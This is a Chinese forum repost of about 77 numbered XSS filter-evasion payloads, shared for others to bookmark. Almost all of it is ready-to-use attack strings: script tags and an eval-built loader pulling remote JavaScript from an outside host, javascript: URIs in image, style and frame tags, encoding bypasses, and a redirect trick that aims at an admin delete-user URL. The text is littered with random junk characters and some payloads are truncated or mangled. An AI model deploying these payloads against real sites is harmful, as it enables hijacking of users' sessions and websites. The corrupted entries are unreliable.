貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。& e7 e* a0 ^2 U f/ R
! o! |/ }& S8 ?0 q
(1)普通的XSS JavaScript注入
* L0 M" L) y: W3 }8 N* q, O <SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>- a" e+ C# f) O4 F5 _
! f. ~* V* E- t9 ~, X) ^* ~$ }/ m0 P
(2)IMG标签XSS使用JavaScript命令
5 u) f: T9 p+ W$ s5 B, q. f <SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>' q! b1 P- ^) S( W1 d) ~
! k! \ C* s) X; I3 `
(3)IMG标签无分号无引号' `$ Z a; D" g$ J+ {
<IMG SRC=javascript:alert(‘XSS’)>- b- I7 Z5 o$ ^$ T. g5 Q( t8 X
, o: p, D. }# B
(4)IMG标签大小写不敏感
9 V6 [ l0 x. h$ r! D6 m <IMG SRC=JaVaScRiPt:alert(‘XSS’)>
+ S# k" m/ U3 {' K) N& F
9 h+ Z; {1 f. s4 T7 b' x" P (5)HTML编码(必须有分号)
! Y) N4 e8 V3 Y3 S' I. C$ J <IMG SRC=javascript:alert(“XSS”)>
4 h$ O: J" B2 L4 [: B X0 ]5 P1 ?- f t
(6)修正缺陷IMG标签
! }& f# V* U( f2 Y$ L <IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>3 T3 j1 y$ \( X- k
3 y# B: E1 `& o: L* V$ w
(7)formCharCode标签(计算器)- N. J0 p- R, D1 P* x! j
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
, @" n5 C q, H. }
# v( m2 Q4 }0 m4 P (8)UTF-8的Unicode编码(计算器)
% q: Q! }+ n; q4 y0 {; j6 B H2 H9 M# y <IMG SRC=jav..省略..S')>
; j* o9 m$ @6 s1 O% R. U
7 Y4 w+ q1 `4 d (9)7位的UTF-8的Unicode编码是没有分号的(计算器)
3 ?, e6 m% z( d, s( Z <IMG SRC=jav..省略..S')>
( x0 m8 l# j% P% l
* s& ^8 e9 }0 v/ Z0 o: F (10)十六进制编码也是没有分号(计算器)
' I; i0 k; q. g8 n# ] <IMG SRC=java..省略..XSS')>
0 X, ]: p% ^' b' \; {3 b, A! j
! [2 e+ m& c. h: L6 @2 I3 G2 H (11)嵌入式标签,将Javascript分开4 _: I5 C7 ~$ w' P6 J7 D# y
<IMG SRC=”jav ascript:alert(‘XSS’);”>$ {9 \" `/ W Y3 | e
3 }- w) b+ f8 M
(12)嵌入式编码标签,将Javascript分开
' p( M, l8 a! N; ? <IMG SRC=”jav ascript:alert(‘XSS’);”>
l8 a$ C: Z+ V4 M8 Y1 H9 |% ?/ }& @: f$ _. l- e# y
(13)嵌入式换行符
' ^& @! ~( {7 @ <IMG SRC=”jav ascript:alert(‘XSS’);”>
4 K, X0 [5 _# G6 t) R* n) t) I# `8 [2 p \
(14)嵌入式回车! G6 |/ @; R/ L0 u2 h9 l4 q1 @* F
<IMG SRC=”jav ascript:alert(‘XSS’);”>. X7 a9 ^4 x0 o" M% D
! C7 W J, w% l3 |6 v" C
(15)嵌入式多行注入JavaScript,这是XSS极端的例子1 U) L& O( E7 p2 ]7 j% ~2 ~
<IMG SRC=”javascript:alert(‘XSS‘)”>& ~" K# o4 N" ]- o- u
6 A* T; w* [- X) y (16)解决限制字符(要求同页面)
5 f! r* S! j4 }- S2 h L; C* w9 \ <script>z=’document.’</script>
) Q+ k: R* C* R& I <script>z=z+’write(“‘</script>$ C0 P' q8 b3 B9 }9 ^& {2 G9 w4 Q% ?
<script>z=z+’<script’</script>7 E6 m& }/ T) J2 \5 W. W& i: R
<script>z=z+’ src=ht’</script>
" y( c# d" h3 w# g# ?) x <script>z=z+’tp://ww’</script>3 F: Z$ {/ a2 d, y4 Q
<script>z=z+’w.shell’</script>3 x+ }. }# D5 C( B2 _- P2 B
<script>z=z+’.net/1.’</script>
1 r A R: ~" ~! Q <script>z=z+’js></sc’</script>
) l# n; |' V. M& [% U" X <script>z=z+’ript>”)’</script>& V4 r& n4 g% d
<script>eval_r(z)</script>
/ Z& x2 r s6 c+ ?6 a7 J! o( a7 U! g+ h0 l* ]* c- r+ e
(17)空字符
8 m- K, `: m9 W4 B* J& `0 D' ` perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out7 B) M9 p! ^/ L0 f. i
) m* k7 ~2 N, D, i (18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
! k* Y3 x1 Z, y+ C% ^" ~ perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
) K. W6 h/ a9 A8 T4 l* }2 a
6 f) l2 y, p; Y (19)Spaces和meta前的IMG标签* Z- h+ e4 Y& c" ]0 S a& J
<IMG SRC=” � javascript:alert(‘XSS’);”>
) ^' U. a8 T1 t5 M. [7 L- W
0 F# T/ \: b! t" L" c (20)Non-alpha-non-digit XSS
, y2 Z2 q2 w: I0 O, e <SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>8 r& \7 Z) f, Y2 S. H2 D7 U( T7 a1 I
" ^- \: |8 D @5 T' t$ | (21)Non-alpha-non-digit XSS to 2& X! |6 u. {' |3 \6 k/ f
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>2 i1 n% x7 `2 |- L1 C
' b( L6 Y* {- V+ l (22)Non-alpha-non-digit XSS to 32 I9 s# S- s' y
<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>* x' F% l3 o7 y/ V
3 i9 L) D$ _# t0 E, D) @+ g
(23)双开括号6 U9 j* J* H+ Q' u- y
<<SCRIPT>alert(“XSS”);//<</SCRIPT> }! d# g0 u8 K0 G- n
2 v* ~2 G) I* l* n X8 [; e2 P' v: D" F
(24)无结束脚本标记(仅火狐等浏览器)
% [+ k' ?$ C0 T- N$ \( ], y <SCRIPT SRC=http://3w.org/XSS/xss.js?<B>6 h+ @- a$ U- w. ?' o
. D4 q% r! S* m* z" v; a
(25)无结束脚本标记2" Q7 n* C* E. i
<SCRIPT SRC=//3w.org/XSS/xss.js> ]2 S! }" @( Q! ^- i: A6 v
$ [( A9 `% I% d- q: B (26)半开的HTML/JavaScript XSS
: b4 @4 [: S& v <IMG SRC=”javascript:alert(‘XSS’)”
' ]5 J/ R- w' {( ?" T+ P/ ~& L
(27)双开角括号
* y3 z5 A; m2 i" y% O- A9 { <iframe src=http://3w.org/XSS.html <
) N: B9 w7 E- S( e- i) v a5 f& m& E% L/ S
(28)无单引号 双引号 分号
' B3 h& R, G% a& F, Y+ }3 { <SCRIPT>a=/XSS/) k' v; h) m( h. ]
alert(a.source)</SCRIPT>& d; m7 D: i! |! i( R# E
. j" ]% l7 Y8 E8 \
(29)换码过滤的JavaScript
! z$ B( r8 O0 ^" O \”;alert(‘XSS’);//0 e( }8 _, F, Y' n" b/ R
9 |5 c+ v$ l1 f4 E+ m1 ?2 G# M3 ^ (30)结束Title标签2 e& k1 l+ Z, L6 C
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
! N$ X# w+ k/ ?( l4 y, J# p6 s# b
(31)Input Image
3 v% s2 J! j, |" W <INPUT SRC=”javascript:alert(‘XSS’);”>+ A, l) z0 V `: ^8 S' u. ~7 Q
! A% R4 `, U/ N' J& B, j. i
(32)BODY Image& {+ C1 A6 Z3 C+ r, F4 L* F
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
: E3 O# g* B7 D4 A/ {4 y( x* N3 W& Y# O+ |
(33)BODY标签
9 Y* h* v* H% t8 E- D7 O <BODY(‘XSS’)>2 Z, D! ?" U9 I8 m- q5 z( t
2 u9 I1 H% n# c- q5 f# H" @0 V3 l. }7 c5 o (34)IMG Dynsrc
2 n% B0 G/ u8 [9 \# V <IMG DYNSRC=”javascript:alert(‘XSS’)”>
3 R' L, G& t: s+ S: g2 x$ R1 q% `3 E3 R% v2 ?
(35)IMG Lowsrc3 c; r+ q X5 n5 n7 j; E
<IMG LOWSRC=”javascript:alert(‘XSS’)”>; O& i- e: D7 ~# m8 |9 V
% }$ w% K' v4 F
(36)BGSOUND- W+ @' F( V0 e9 F8 p% W
<BGSOUND SRC=”javascript:alert(‘XSS’);”>
' z2 L& N `( j/ G) @
! Z% V/ m+ g( S- s7 q (37)STYLE sheet
& h& S; A/ R$ y2 J4 V. y" P <LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>0 x, e6 c- q1 K: [9 U) z$ K& z) E
% ]9 S- ]) h. m. F/ I3 k
(38)远程样式表: A5 h7 ?$ I- b
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”> P9 T* @& x+ V/ |0 R
1 T+ i0 g9 ~# C i. C$ L (39)List-style-image(列表式)( ` R: c& F! G1 h
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
6 ?3 I6 {( @/ A: X7 Q+ t. @) S+ ]
(40)IMG VBscript2 {0 p; b+ t) {8 b$ M9 }& o6 |
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS6 I& I/ S t$ w2 D o
1 l7 ~! A* B+ O# j& r& n
(41)META链接url
( K# J8 n2 W0 T- d <META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”> ^) x; U7 B8 m# O0 V. ]# `
) H& r3 M6 D5 E
(42)Iframe3 ]- P3 p8 E$ { a/ R. E
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>% @" U4 V0 z, G# N* Z
$ V: s' A3 Z$ n4 `" W& Q0 A. h( t (43)Frame
6 e3 G4 @& @9 _2 k( m4 l <FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>; K ^) L5 e( w3 `! i/ n) J
% a; q- Z z6 X* o2 U# e
(44)Table
e. U# _8 E) F$ X <TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
. X3 I U; m8 l2 u+ @$ ?9 k4 D1 O! W1 L
(45)TD
# g, |& K% Y0 J4 Y L, F5 ?7 h <TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>+ _% X1 E; X0 M1 T
1 N& j: T4 J% d& r (46)DIV background-image) Y- `/ [ r2 F+ _" y* S# W
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
/ e0 s6 ~) |9 F9 R3 ~
8 j& w3 h) ]7 O (47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)
6 r& h6 n# ~9 j3 l7 @$ [3 ] <DIV STYLE=”background-image: url(�javascript:alert(‘XSS’))”>0 E% X/ z$ Y! I1 \" H# a
3 ^- w! u5 A5 E6 x) ~5 _% d
(48)DIV expression
: d( [8 l' W& d1 E' o0 W x <DIV STYLE=”width: expression_r(alert(‘XSS’));”>
V! H" Y& I4 {* ^; {1 z5 C
" v# Q S# f) T: B (49)STYLE属性分拆表达& E- Y) s/ C! E7 h9 r/ C0 [
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
^& w- S( T' @& [7 h
! Y/ E# d: h. K( |1 A) n (50)匿名STYLE(组成:开角号和一个字母开头)/ x7 E) Q5 ~9 T+ ?
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>8 k( b. V) n% ~+ k2 F- x" N# K
5 |) \! r9 U J) k4 ] e
(51)STYLE background-image
' ]/ y+ K( w/ y' K+ b/ g <STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>& B+ \. Q9 N2 A4 M9 A0 P/ N
+ F9 v U; g5 Y: `* w5 z (52)IMG STYLE方式; m6 ~3 ?9 A4 ?/ c& x& w
exppression(alert(“XSS”))’>! g3 q% B) H3 b* j6 @
+ a. K( M* {: |1 H7 A5 Z (53)STYLE background: Y8 I4 a4 `3 \" Q
<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
& i3 O9 e5 i1 b" V7 o% j" o
+ ~8 ~1 h9 [9 N7 N/ l9 E (54)BASE3 y( q# S* |$ Y$ A
<BASE HREF=”javascript:alert(‘XSS’);//”>
% ?# d$ l3 C- L* o/ q
4 q+ @8 Z$ j* \% F/ b (55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
7 n# s" f5 ^7 E- |* W9 P7 L. @ <EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>
/ j" x) T8 x7 ]% E8 t
m0 n _6 h3 N& H (56)在flash中使用ActionScrpt可以混进你XSS的代码
$ j( K+ ], Y# ?# t% N/ Q$ k a=”get”;
$ [- B0 u1 B6 ]$ {& k b=”URL(\”";! ]: R1 U0 |, [; ^: m5 N7 U
c=”javascript:”;6 Q& T5 I1 S( I7 L* q
d=”alert(‘XSS’);\”)”;" d' O2 \4 v0 e2 m4 W
eval_r(a+b+c+d);
3 B7 N' B$ Y0 W' O( G* w8 d: @0 R8 L$ }4 l2 `( P" |
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上/ P0 C& {3 Y6 C. W! y# b
<HTML xmlns:xss>$ j" W* R' b% N. Q# l, e4 q
<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>
" _3 d( L& A2 {) }; D <xss:xss>XSS</xss:xss>
" _* T: v3 k; h# d3 _9 Z Y# L </HTML>) z( u' A1 A/ y6 w
& O4 N/ W P* X9 ]) k( z' t (58)如果过滤了你的JS你可以在图片里添加JS代码来利用, z+ K- C/ e+ T8 x6 k% @9 Y8 n% \/ k
<SCRIPT SRC=””></SCRIPT>5 m4 {7 H ^3 y! Q" O5 j
( C; ?2 S. f% n* Q! @
(59)IMG嵌入式命令,可执行任意命令, L) e! ]* @, V" [& ?
<IMG SRC=”http://www.XXX.com/a.php?a=b”>! ?9 L s8 j5 B- I4 O. | } z" K
9 I8 C' s' r6 c/ h4 w
(60)IMG嵌入式命令(a.jpg在同服务器)
P# ]# R/ w3 f3 ]6 g$ Q1 u Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser! ~; X! s4 v/ f' V0 Y
, M; |/ ` T3 I
(61)绕符号过滤. w: T4 h9 {& {; @% |
<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>$ [8 t$ w- j6 }0 ]! H* b
! R( `+ {* m* f0 Y" Z (62)0 {* ^. A1 o6 x
<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>
9 A: _6 o5 B) K$ F, E: X6 y+ \- O' p, J4 ^5 @' ]8 \2 j+ g
(63)
. x/ g( s1 Z) R* D <SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>8 M6 z* m, ~% z8 a, u2 ?
; V. x4 s& B A6 N
(64)
- M/ t- ]( n5 }' o <SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>
0 J7 h' f% l' a, S* `, D7 D! c0 q
$ [6 Y. d; d& Z0 b (65)& |. J4 t [1 R2 J
<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
* F. H U8 q+ z( \
! Q; w H' C* K6 f& A (66)* {) }# \: P$ ?; @, Z
<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>" @# ~4 x; y. Z+ V- k7 d! I {$ k
2 B7 s3 {5 B7 o- U9 ?: E( f1 R& R (67)
1 d# `. s! S; N: q/ z2 T0 X8 s <SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>
: P& N" c, N4 x+ I$ F
/ E+ q* v' r% p& m& n (68)URL绕行* E6 C. m# U+ |7 j4 k# N5 B
<A HREF=”http://127.0.0.1/”>XSS</A>
- o! _& W3 @7 D3 ~+ V
- _% L9 r$ r/ ^$ | (69)URL编码+ [) |% k# w# F) m! D
<A HREF=”http://3w.org”>XSS</A>
* u7 e4 c$ H) a+ i/ `. x A4 Z0 ^1 E5 U0 t# Q! S) v1 A) w) E3 ^
(70)IP十进制
! b/ k) R+ j9 P" h% V' q5 ]* l$ y <A HREF=”http://3232235521″>XSS</A>
4 R- l" ?% |2 a0 z% H
8 @: _) d! S, ~& [, y; G, y (71)IP十六进制' x+ u" H& }- [
<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>$ B1 }2 b7 N7 I2 P! A
: H3 q5 i. V' B# Z9 C1 v* S0 R
(72)IP八进制
6 A" g( H U0 D- i) y <A HREF=”http://0300.0250.0000.0001″>XSS</A>! R5 ~2 ^# \; F% K) y
; y) o( q. p/ V2 c& P' h (73)混合编码' C4 @8 x* J7 u% f) v& h
<A HREF=”h6 i; ~9 X: f( p) F8 ?, o
tt p://6 6.000146.0×7.147/”">XSS</A>
3 O6 U5 W9 h& s5 B& c4 ]
( F4 R% v: B* Y1 A (74)节省[http:]& B6 R( ^. `. z1 X
<A HREF=”//www.google.com/”>XSS</A>
5 p7 \; v: x& e- H6 n
, a( [! q# C* P9 i& F0 | (75)节省[www]0 D, h0 Y+ [. N6 D- E2 x
<A HREF=”http://google.com/”>XSS</A>- L# B' v6 M5 Y
$ D3 D0 z. q' b. v" C, j$ B7 c
(76)绝对点绝对DNS
; U) ^/ g, q( ? Q% q& j- U <A HREF=”http://www.google.com./”>XSS</A># a9 ]( Q8 n0 P: b( m0 L+ b
* y' M5 ^$ ]) L/ M: G
(77)javascript链接) w( h5 b# o7 c F; E6 t0 z
<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A> |
发表于 2012-9-5 14:56:34
收藏
支持
反对